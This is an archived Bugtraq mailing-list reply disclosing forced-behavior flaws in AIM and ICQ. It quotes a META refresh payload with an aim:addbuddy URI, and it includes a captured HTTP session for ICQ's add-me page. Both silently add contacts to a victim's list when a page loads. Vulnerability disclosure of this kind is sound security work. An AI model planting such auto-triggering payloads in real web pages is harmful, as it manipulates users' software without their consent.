Re: AIM forced behavior "issue" Re:ICQ and MSIE allow execution of arbitrary code

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

Knud,
This issue is still here, only address that you use is not longer valid,
because is changed...
At end is the http session (for my icq beware :)).
Also seems that no one take attention Jelmer's exploit for ICQ and MSIE.
It must be examined througly for other variants and complete solution must
be given to the comunity!
ATTENTION it is a HIGH security risk for clients - it works with almost any
ICQ and IE, and ICQ must be installed in default path, or script to "guess"
where, but anyway this is a very common case.


Http session for the icq:

GET http://wwp.icq.com/whitepages/add_me/?uin=71398287&action=add HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Accept-Language: bg,en-us;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Host: wwp.icq.com
Proxy-Connection: Keep-Alive

HTTP/1.0 200 OK
Date: Thu, 18 Jul 2002 07:12:12 GMT
Server: Apache/1.3.26 (Unix) mod_ssl/2.8.9 OpenSSL/0.9.6d
P3P: CP="ONL UNI COM PHY NAV INT DEM CURo OUR"
Content-Type: application/x-icq
Proxy-Connection: close

<!-- Vignette StoryServer 5.0 Thu Jul 18 03:12:12 2002 -->
[ICQ User]
UIN=71398287
Email=
NickName=
FirstName=
LastName=


----- Original Message -----
From: "Knud Erik Højgaard" <kain@egotrip.dk>
To: "orb" <orb@mindflip.org>; <bugtraq@securityfocus.com>
Sent: Monday, July 16, 2001 11:44 PM
Subject: Re: AIM forced behavior "issue"


> > Example
> > <META
> >
>
HTTP-EQUIV="refresh"CONTENT=0;URL=aim:addbuddy?listofscreennames=mindfliporg
> ,mfliporb,mflipmax,mflips0nic,mflipzorcon&groupname=mindfliporg>
> >
> > A web page loaded with the above code in it's META REFRESH tag would
> > automatically add a group to the users buddylist called mindfliporg and
> > add buddy's
> > mindfliporg, mfliporb, mflipmax, mflips0nic, mflipzorcon to the group.
>
> We tried some similar stuff with icq a while ago, live example at
> http://knudergud.dk/dev/icq.html ..
> it seems broken now, but the idea should be obvious. adding to a contact
> list using javascript, requiring
> no user interaction.. stupid software.
>
> -Knud
>
>
[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux